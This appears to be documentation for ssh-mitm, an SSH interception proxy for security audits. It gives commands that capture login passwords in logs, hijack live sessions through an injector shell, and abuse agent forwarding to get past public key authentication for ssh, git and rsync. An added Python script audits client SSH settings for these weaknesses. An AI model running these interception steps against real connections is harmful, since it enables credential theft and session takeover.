ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation
Connect to the network
To start an intercepting ssh-mitm server on port 10022, all you have to do is run a single command.
$ ssh-mitm --remote-host 192.168.0.x
Now let's try to connect to the ssh-mitm server.
$ ssh -p 10022 user@proxyserver
You will see the credentials in the log output.
2021-01-01 11:38:26,098 [INFO] Client connection established with parameters: Remote Address: 192.168.0.x Port: 22 Username: user Password: supersecret Key: None Agent: None
Hijack SSH sessions
When a client connects, the ssh-mitm starts a new server, which is used for session hijacking.
[INFO] created injector shell on port 34463
To hijack this session, you can use your favorite ssh client. All you have to do is to connect to the hijacked session.
$ ssh -p 34463 127.0.0.1
SSH-MITM proxy server is capable of advanced man-in-the-middle attacks and can be used in scenarios where the remote host is not known, where a single remote host is not sufficient, or where public key authentication is used.
Public key authentication
Public key authentication is a way of logging into an SSH/SFTP account using a cryptographic key rather than a password.
The advantage is that no confidential data needs to be sent to the remote host, where it could be intercepted by a man-in-the-middle attack.
Due to this design, SSH-MITM proxy server is not able to reuse the data provided during authentication.
If you need to intercept a client with public key authentication, there are some options.
SSH supports agent forwarding, which allows a remote host to authenticate against another remote host.
SSH-MITM proxy server is able to request the agent from the client and use it for remote authentication. By using this feature, an SSH-MITM proxy server is able to perform a full man-in-the-middle attack.
To use agent forwarding, SSH-MITM proxy server must be started with --request-agent.
$ ssh-mitm --request-agent --remote-host 192.168.0.x
The client must be started with agent forwarding enabled.
$ ssh -A -p 10022 user@proxyserver
In most cases, when git is used over ssh, public key authentication is used. The default git command does not have a parameter to forward the agent.
To enable agent forwarding, git has to be executed with the ``GIT_SSH_COMMAND`` environment variable.
# start the ssh server
ssh-mitm --remote-host github.com --request-agent --scp-interface debug_traffic
# invoke git commands
GIT_SSH_COMMAND="ssh -A" git clone ssh://firstname.lastname@example.org:10022/ssh-mitm/ssh-mitm.git
When ssh-mitm is used to intercept rsync, the port must be provided as a parameter to rsync. The agent can also be forwarded if needed.
To sync a local directory with a remote directory, rsync can be executed with the following parameters.
rsync -r -e 'ssh -p 10022 -A' /local/folder/ email@example.com:/remote/folder/
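Everything the agent-forwarding, git and rsync examples above rely on is decided on the client side: the agent is only available to the proxy if the client passes `-A` (or sets `ForwardAgent yes`), and the proxy is only reached unnoticed if the client accepts an unknown host key. The following script is an added example, not part of the ssh-mitm project: it audits an OpenSSH `ssh_config` text and an ssh command line (such as a `GIT_SSH_COMMAND` value or an rsync `-e` string) for exactly those settings. The option names are real OpenSSH ssh_config keys; the sample configs, host names and the `RISKY` rule table are constructed for illustration.

```python
"""Audit OpenSSH client settings that make agent-forwarding interception
possible.  Added example; not code from the ssh-mitm project."""
import re
import shlex

# Constructed rule table.  Keys are real ssh_config options (lower-cased);
# the value is the setting that weakens the client, plus the reason.
RISKY = {
    "forwardagent": (
        "yes",
        "an intercepting server that requests the agent can authenticate onward",
    ),
    "stricthostkeychecking": (
        "no",
        "unknown or changed host keys are accepted without prompting",
    ),
}

# Constructed ~/.ssh/config with one weak host block.
WEAK_CONFIG = """
Host *
    ForwardAgent no
    StrictHostKeyChecking ask

Host proxyserver
    Port 10022
    ForwardAgent yes
    StrictHostKeyChecking no

Host git.example.org
    IdentityFile ~/.ssh/id_ed25519
"""

# Constructed hardened counterpart: no forwarding, host keys must be known.
HARDENED_CONFIG = """
Host *
    ForwardAgent no
    StrictHostKeyChecking yes
"""


def parse_ssh_config(text):
    """Return {host_pattern: {option: value}} from ssh_config text.

    Options before the first Host/Match line are stored under "*".
    Within a block the first occurrence of an option wins, as in ssh."""
    blocks = {"*": {}}
    current = "*"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        # ssh_config accepts "Key value", "Key=value" and "Key = value".
        m = re.match(r"^(\w+)\s*=?\s*(.*)$", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key in ("host", "match"):
            current = value
            blocks.setdefault(current, {})
            continue
        blocks[current].setdefault(key, value)
    return blocks


def audit_config(text):
    """Return (host_pattern, option, value, reason) for every risky setting."""
    findings = []
    for host, opts in parse_ssh_config(text).items():
        for key, (bad, reason) in RISKY.items():
            if opts.get(key, "").lower() == bad:
                findings.append((host, key, opts[key], reason))
    return findings


def audit_command(cmd):
    """Return reasons why an ssh command line enables agent forwarding."""
    argv = shlex.split(cmd)
    reasons = []
    for i, arg in enumerate(argv):
        if arg == "-A":
            reasons.append("-A enables agent forwarding")
        opt = None
        if arg == "-o" and i + 1 < len(argv):
            opt = argv[i + 1]           # "-o ForwardAgent=yes"
        elif arg.startswith("-o") and len(arg) > 2:
            opt = arg[2:]               # "-oForwardAgent=yes"
        if opt and re.fullmatch(r"ForwardAgent\s*=?\s*yes", opt, re.I):
            reasons.append("-o ForwardAgent=yes enables agent forwarding")
    return reasons


if __name__ == "__main__":
    for host, key, value, reason in audit_config(WEAK_CONFIG):
        print(f"[config] Host {host}: {key} {value} -> {reason}")
    for cmd in ("ssh -A", "ssh -p 10022 -A", "ssh -p 10022 user@proxyserver"):
        print(f"[command] {cmd!r}: {audit_command(cmd) or 'ok'}")
```

Run it against a real `~/.ssh/config` by passing the file contents to `audit_config`; the hardened config reports nothing, while the weak block for `proxyserver` is flagged twice. The command checker is deliberately limited to the `-A` and `-o ForwardAgent` spellings shown on this page; an `ssh -Ap 10022` style bundled flag is not recognised.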
SSH-MITM has some integrated client exploits, which can be used to audit various ssh clients such as OpenSSH and PuTTY.
Full Documentation: https://docs.ssh-mitm.at